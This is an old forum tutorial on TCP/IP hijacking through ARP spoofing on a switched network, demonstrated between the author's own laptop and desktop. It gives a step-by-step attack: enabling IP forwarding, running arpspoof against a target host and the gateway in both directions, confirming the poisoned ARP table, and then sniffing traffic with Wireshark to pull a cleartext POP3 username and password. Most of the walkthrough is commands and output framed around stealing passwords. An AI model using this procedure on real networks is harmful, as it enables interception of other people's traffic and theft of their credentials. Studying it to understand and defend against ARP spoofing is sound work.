Ghost Hawk
September 2007
Introduction
TCP/IP Hijacking is one of the most simple, yet powerful attacks a hacker can use. With proper use TCP/IP
Hijacking can be used to sniff passwords and other information from a switched network. When an Ethernet network
uses a HUB, packets that are sent to the hub from a pc on the network, are transmitted to all of it's
ports. Using a HUB on your network makes sniffing all the data on the network easy. What about sniffing on a
switched network? A switch is more intelligent then a hub. On a switched network, the switch inspects packets
that it receives then forwards that packet to the correct destination according to it's table. This makes
sniffing on the network a bit harder.
What is TCP/IP Hijacking?
With TCP/IP Hijacking an attacker sets up a device on the network that tricks other devices on the network
into sending their packets to it instead of where they are intended to go. With wired networks, TCP/IP Hijacking
will use a technique known as spoofing, which is basically the act of pretending to be something you are not.
One of the most common types of spoofing used in TCP/IP Hijacking is Address Resolution Protocol (ARP)
spoofing. Every computer on an Ethernet network using TCP/IP must have a unique IP address. They must also have
another address known as the media access control (MAC) address so they can move packets around the network. Each
computer on the network will then keep a table of IP Address and their corresponding MAC address, known as the ARP
Table. When ARP Spoofing a hacker will change that table to redirect packets on the network to their computer.
Example of ARP Spoofing
In this example I will be using ARP spoofing between my laptop and desktop on my switched network.
Target IP Address: 192.168.5.46
Gateway IP Address: 192.168.5.1
My MAC Address: 00:16:D4:C7:B9:CD
First thing I will do is turn on IP Forwarding in my linux box to allow routing of packets, if you skip this step
it will basically act as a DoS which will make it hard to sniff.
Code: Select all
bt ~ # nano /proc/sys/net/ipv4/ip_forward
On the target machine I opened up a cmd prompt just to look at the current ARP Table.
Code: Select all
C:\Documents and Settings\travis>arp -a
Interface: 192.168.5.46 --- 0x3
Internet Address Physical Address Type
192.168.5.1 00-50-8b-cc-43-48 dynamic
192.168.5.2 00-30-48-74-e9-cc dynamic
192.168.5.220 00-30-48-74-e8-dc dynamic
C:\Documents and Settings\travis>
Now I switch to my linux box and start the program arpspoof to try to change that table.
Code: Select all
bt ~ # arpspoof -t 192.168.5.46 192.168.5.1
0:16:d4:c7:b9:cd 0:1:6c:a7:3e:8b 0806 42: arp reply 192.168.5.1 is-at 0:16:d4:c7:b9:cd
0:16:d4:c7:b9:cd 0:1:6c:a7:3e:8b 0806 42: arp reply 192.168.5.1 is-at 0:16:d4:c7:b9:cd
0:16:d4:c7:b9:cd 0:1:6c:a7:3e:8b 0806 42: arp reply 192.168.5.1 is-at 0:16:d4:c7:b9:cd
my mac address 0:16:d4:c7:b9:cd.
Now you turn the command around.
Code: Select all
bt ~ # arpspoof -t 192.168.5.1 192.168.5.46
0:16:d4:c7:b9:cd 0:50:8b:cc:43:48 0806 42: arp reply 192.168.5.46 is-at 0:16:d4:c7:b9:cd
0:16:d4:c7:b9:cd 0:50:8b:cc:43:48 0806 42: arp reply 192.168.5.46 is-at 0:16:d4:c7:b9:cd
So I go back to the target machine and look at the ARP table again.
Code: Select all
C:\Documents and Settings\travis>arp -a
Interface: 192.168.5.46 --- 0x3
Internet Address Physical Address Type
192.168.5.1 00-16-d4-c7-b9-cd dynamic
192.168.5.2 00-30-48-74-e9-cc dynamic
192.168.5.6 00-16-d4-c7-b9-cd dynamic
192.168.5.51 00-11-0a-f8-ef-db dynamic
192.168.5.144 00-00-74-a5-8a-b3 dynamic
192.168.5.220 00-30-48-74-e8-dc dynamic
C:\Documents and Settings\travis>
Time to open up the sniffer. You can use whatever sniffer you feel more comfortable with, in the example I used
Wireshark. I ran Wireshark for a few minutes, then went back and looked at all the packets I collected. The main
thing I am looking for right now is the POP3 username and password. I look through the list and see some lines that
contain POP3 in them. I right click on one of the packets and clicked Follow TCP Stream. What I saw was this:
Code: Select all
+OK Hello there.
AUTH
-ERR Invalid command.
USER user@domain.com
+OK Password required.
PASS uwish
+OK logged in.
STAT
+OK 0 0
QUIT
+OK Bye-bye.